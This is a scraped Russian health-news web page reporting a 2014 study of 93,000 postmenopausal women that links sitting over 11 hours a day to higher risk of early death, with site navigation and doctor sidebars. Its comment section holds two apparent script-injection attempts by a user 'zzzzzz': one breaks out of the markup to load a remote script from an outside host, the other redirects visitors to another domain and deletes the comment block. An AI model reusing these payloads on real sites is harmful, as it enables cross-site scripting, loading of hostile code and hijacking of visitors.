Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женщины умирают из-за сту...  >>  Женщины умирают из-за стульев! Хватит сидеть!
 
Обратная связь
 

Женщины умирают из-за стульев! Хватит сидеть!

Размер шрифта
21 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые выяснили, что у женщин зрелого возраста длительное сидение увеличивает риск ранней смерти!

Женщины умирают из-за стульев! Хватит сидеть!

Исследование, проведенное на 93 000 женщинах в период постменопаузы, показало, что у дам, которые много сидят (на работе, дома, в том числе и спят в кресле), выше риск ранней смерти, чем у их активных подруг. Это утверждение оставалось верным даже с поправкой на различия в общем состоянии здоровья и физической активности. Можно сказать, что даже те, кто регулярно занимается спортом, находятся в группе риска, если позволяют себе много сидеть.

Выяснилось, что у женщин, которые сидят более 11 часов в день, на 12% повышается риск преждевременной смерти, независимо от причины, по сравнению с теми представительницами прекрасного пола, которые сидят менее 4 часов в день. У «сидящих» женщин увеличивается риск смерти от заболеваний сердечно-сосудистой системы, ишемической болезни сердца, рака на 13%, 27% и 21% соответственно.

Ранее бытовало мнение, что если вы находитесь в хорошей спортивной форме и регулярно занимаетесь, то вы вне опасности, даже если проводите долгое время, сидя за компьютером или на диване. «Вовсе нет, – возражают исследователи. – Несмотря на достаточную физическую активность, вы совершенно не защищены от негативных последствий сидячего образа жизни».

Все даже хуже, чем вы думаете. Чрезмерное сидение затрудняет возврат к былой спортивной форме. Около 35 лет женщины начинают терять мышечную массу, и это изменение лишь усиливается после менопаузы. Регулярные физические упражнения, особенно силовые, могут приостановить этот процесс, однако эффективнее всего они действуют вкупе с ежедневной физической активностью.

«Используй свои мышцы или теряй их, – говорит автор исследования Ребекка Сегейн. – Современные технологии делают нашу работу более эффективной, однако заставляют нас забыть о физической нагрузке. Женщинам особенно важно найти способы оставаться активными».

Начинать лучше всего заранее, еще в молодом возрасте. Находите поводы чаще ходить по офису или квартире. Устраивайте «физкультминутки» во время сидения за компьютером, книгой или телевизором.

В данное исследование вошли женщины в возрасте 50-79 лет, которые наблюдались в течение 12 лет и более. Ранее также проводились работы, связывающие проблемы со здоровьем с сидячим образом жизни, однако исследование Ребекки Сегейн считается наиболее крупным и этнически разнообразным.

Все о здоровье женщины в нашем специальном проекте!

Данная статья основана на материалах, предоставленных Корнелльским Университетом, США. Результаты исследования были опубликованы в 2014 году в «Американском журнале превентивной медицины».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как Анджелина Джоли изменила наш мир?   Почему никто не смотрит женский футбол?   Привычка, которая есть у каждой женщины, повышает риск умереть!   От чего умирает Россия  
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Какие ошибки не дадут вам похудеть в Новом году
Как расслабиться за 15 минут
Что нельзя делать перед сном

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.